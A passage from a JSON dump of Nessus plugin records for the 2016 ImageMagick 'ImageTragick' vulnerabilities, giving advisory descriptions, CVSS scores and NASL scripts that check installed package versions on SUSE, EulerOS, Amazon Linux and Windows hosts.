(slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"imagemagick\", pkgver:\"6.9.4_1\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.1.0\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:55:55", "description": "This update for ImageMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Several coders were vulnerable to remote code execution attacks, these coders have now been disabled. They can be re-enabled by exporting the following environment variable MAGICK_CODER_MODULE_PATH=/usr/lib64/ImageMagick-6.4.3/modules-Q16/coders/vulnerable/ (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering leads to (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral' pseudo protocol which deletes files after reading.\n\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo protocol with any extension in any folder.\n\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label' pseudo protocol to get content of the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP GET or FTP request.\n\nBugs fixed :\n\n - Use external svg loader (rsvg)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-13T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : ImageMagick (SUSE-SU-2016:1275-1) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libMagickCore1", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2016-1275-1.NASL", "href": "https://www.tenable.com/plugins/nessus/91119", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1275-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91119);\n script_version(\"2.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"SUSE SLES11 Security Update : ImageMagick (SUSE-SU-2016:1275-1) (ImageTragick)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ImageMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Several coders were vulnerable to remote code execution\n attacks, these coders have now been disabled. 
They can\n be re-enabled by exporting the following environment\n variable\n MAGICK_CODER_MODULE_PATH=/usr/lib64/ImageMagick-6.4.3/mo\n dules-Q16/coders/vu lnerable/ (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering\n leads to (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using\n ImageMagick's 'ephemeral' pseudo protocol which deletes\n files after reading.\n\n - CVE-2016-3716: Possible file moving by using\n ImageMagick's 'msl' pseudo protocol with any extension\n in any folder.\n\n - CVE-2016-3717: Possible local file read by using\n ImageMagick's 'label' pseudo protocol to get content of\n the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery\n (SSRF) to make HTTP GET or FTP request.\n\nBugs fixed :\n\n - Use external svg loader (rsvg)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3714/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3715/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3716/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3717/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3718/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161275-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7e254931\"\n );\n script_set_attribute(\n 
attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 5 :\n\nzypper in -t patch sleclo50sp3-ImageMagick-12549=1\n\nSUSE Manager Proxy 2.1 :\n\nzypper in -t patch slemap21-ImageMagick-12549=1\n\nSUSE Manager 2.1 :\n\nzypper in -t patch sleman21-ImageMagick-12549=1\n\nSUSE Linux Enterprise Software Development Kit 11-SP4 :\n\nzypper in -t patch sdksp4-ImageMagick-12549=1\n\nSUSE Linux Enterprise Server 11-SP4 :\n\nzypper in -t patch slessp4-ImageMagick-12549=1\n\nSUSE Linux Enterprise Server 11-SP3-LTSS :\n\nzypper in -t patch slessp3-ImageMagick-12549=1\n\nSUSE Linux Enterprise Server 11-SP2-LTSS :\n\nzypper in -t patch slessp2-ImageMagick-12549=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4 :\n\nzypper in -t patch dbgsp4-ImageMagick-12549=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3 :\n\nzypper in -t patch dbgsp3-ImageMagick-12549=1\n\nSUSE Linux Enterprise Debuginfo 11-SP2 :\n\nzypper in -t patch dbgsp2-ImageMagick-12549=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libMagickCore1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! 
preg(pattern:\"^(2|3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP2/3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libMagickCore1-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"libMagickCore1-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"libMagickCore1-6.4.3.6-7.34.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T15:44:36", "description": "According to the versions of the ImageMagick packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - It was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. 
A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application.(CVE-2016-3714)\n\n - It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to delete, move, or disclose the contents of arbitrary files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n - A server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP1 : ImageMagick (EulerOS-SA-2016-1021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ImageMagick", "p-cpe:/a:huawei:euleros:imagemagick-c%2b%2b", "p-cpe:/a:huawei:euleros:ImageMagick-perl", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2016-1021.NASL", "href": "https://www.tenable.com/plugins/nessus/99784", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99784);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2016-3714\",\n \"CVE-2016-3715\",\n \"CVE-2016-3716\",\n \"CVE-2016-3717\",\n \"CVE-2016-3718\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"EulerOS 2.0 SP1 : ImageMagick (EulerOS-SA-2016-1021)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ImageMagick packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - It was discovered that ImageMagick did not properly\n sanitize certain input before passing it to the\n delegate functionality. 
A remote attacker could create\n a specially crafted image that, when processed by an\n application using ImageMagick or an unsuspecting user\n using the ImageMagick utilities, would lead to\n arbitrary execution of shell commands with the\n privileges of the user running the\n application.(CVE-2016-3714)\n\n - It was discovered that certain ImageMagick coders and\n pseudo-protocols did not properly prevent security\n sensitive operations when processing specially crafted\n images. A remote attacker could create a specially\n crafted image that, when processed by an application\n using ImageMagick or an unsuspecting user using the\n ImageMagick utilities, would allow the attacker to\n delete, move, or disclose the contents of arbitrary\n files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n - A server-side request forgery flaw was discovered in\n the way ImageMagick processed certain images. A remote\n attacker could exploit this flaw to mislead an\n application using ImageMagick or an unsuspecting user\n using the ImageMagick utilities into, for example,\n performing HTTP(S) requests or opening FTP sessions via\n specially crafted images. (CVE-2016-3718)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1021\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7e626634\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ImageMagick packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ImageMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ImageMagick-6.7.8.9-13\",\n \"ImageMagick-c++-6.7.8.9-13\",\n \"ImageMagick-perl-6.7.8.9-13\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:56:19", "description": "It was discovered that ImageMagick did not 
properly sanitize certain input before passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application.\n(CVE-2016-3714)\n\nIt was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to disclose the contents of arbitrary files.\n(CVE-2016-3715 , CVE-2016-3716 , CVE-2016-3717)\n\nA server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL coders. If you experience any problems after the update, it may be necessary to manually adjust the policy.xml file to match your requirements. 
Please take additional precautions to ensure that your applications using the ImageMagick library do not process malicious or untrusted files before doing so.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-12T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : ImageMagick (ALAS-2016-699) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:ImageMagick", "p-cpe:/a:amazon:linux:imagemagick-c%2b%2b", "p-cpe:/a:amazon:linux:imagemagick-c%2b%2b-devel", "p-cpe:/a:amazon:linux:ImageMagick-debuginfo", "p-cpe:/a:amazon:linux:ImageMagick-devel", "p-cpe:/a:amazon:linux:ImageMagick-doc", "p-cpe:/a:amazon:linux:ImageMagick-perl", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-699.NASL", "href": "https://www.tenable.com/plugins/nessus/91047", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-699.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91047);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"ALAS\", value:\"2016-699\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Amazon Linux AMI : ImageMagick (ALAS-2016-699) (ImageTragick)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that ImageMagick did not properly 
sanitize certain\ninput before passing it to the delegate functionality. A remote\nattacker could create a specially crafted image that, when processed\nby an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would lead to arbitrary execution of shell\ncommands with the privileges of the user running the application.\n(CVE-2016-3714)\n\nIt was discovered that certain ImageMagick coders and pseudo-protocols\ndid not properly prevent security sensitive operations when processing\nspecially crafted images. A remote attacker could create a specially\ncrafted image that, when processed by an application using ImageMagick\nor an unsuspecting user using the ImageMagick utilities, would allow\nthe attacker to disclose the contents of arbitrary files.\n(CVE-2016-3715 , CVE-2016-3716 , CVE-2016-3717)\n\nA server-side request forgery flaw was discovered in the way\nImageMagick processed certain images. A remote attacker could exploit\nthis flaw to mislead an application using ImageMagick or an\nunsuspecting user using the ImageMagick utilities into, for example,\nperforming HTTP(S) requests or opening FTP sessions via specially\ncrafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file\nthat disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT,\nand LABEL coders. If you experience any problems after the update, it\nmay be necessary to manually adjust the policy.xml file to match your\nrequirements. 
Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-699.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update ImageMagick' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ImageMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ImageMagick-c++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ImageMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ImageMagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/12\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"ImageMagick-6.7.8.9-13.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ImageMagick-c++-6.7.8.9-13.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ImageMagick-c++-devel-6.7.8.9-13.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ImageMagick-debuginfo-6.7.8.9-13.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ImageMagick-devel-6.7.8.9-13.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ImageMagick-doc-6.7.8.9-13.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ImageMagick-perl-6.7.8.9-13.19.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-c++ / ImageMagick-c++-devel / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:56:53", "description": "The remote Windows host has a version of ImageMagick installed that is prior to 7.0.1-1 or 6.x prior to 6.9.3-10. It is, therefore, affected by the following vulnerabilities :\n\n - A remote code execution vulnerability, known as ImageTragick, exists due to a failure to properly filter shell characters in filenames passed to delegate commands. A remote attacker can exploit this, via specially crafted images, to inject shell commands and execute arbitrary code. (CVE-2016-3714)\n\n - An unspecified flaw exists in the 'ephemeral' pseudo protocol that allows an attacker to delete arbitrary files. (CVE-2016-3715)\n\n - An unspecified flaw exists in the 'msl' pseudo protocol that allows an attacker to move arbitrary files to arbitrary locations. (CVE-2016-3716)\n\n - An unspecified flaw exists in the 'label' pseudo protocol that allows an attacker, via a specially crafted image, to read arbitrary files. (CVE-2016-3717)\n\n - A server-side request forgery (SSRF) vulnerability exists due to an unspecified flaw related to request handling between a user and the server.
